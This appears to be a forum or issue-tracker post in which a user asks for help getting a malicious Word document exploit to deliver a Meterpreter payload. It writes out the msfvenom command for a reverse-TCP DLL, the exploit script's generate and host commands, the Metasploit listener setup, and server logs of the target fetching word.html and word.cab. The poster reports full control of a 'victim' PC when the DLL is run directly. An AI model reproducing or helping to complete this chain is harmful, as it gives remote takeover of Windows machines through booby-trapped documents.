Description
I created my own .dll using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=myip LPORT=4444 -f dll -o print.dll
Generated the malicious docx given the dll above: sudo python3 exploit.py generate print.dll http://mypi
Shared the docx with my victim PC and set metasploit as listener:
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost myip
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on myip:4444
Set up the server to transmit other files: sudo python3 exploit.py host 80
File opens ok and I can see the connection attempt to my server, and I'm getting the following messages on port 80:
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:22] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:23] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] code 501, message Unsupported method ('OPTIONS')
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "OPTIONS / HTTP/1.1" 501 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:24] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "HEAD /word.html HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:25] "GET /word.html HTTP/1.1" 304 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:26] "GET /word.cab HTTP/1.1" 200 -
xxx.xxx.xxx.xxx - - [12/Oct/2021 00:55:28] "HEAD /word.html HTTP/1.1" 200 -
But Metasploit stays in the listening state, with no changes.
If I execute the command rundll32 print.dll, start in the victim's PowerShell, Metasploit sets the stage successfully and I can control the victim's PC, which indicates the dll is not the issue.
Any tips on how to troubleshoot?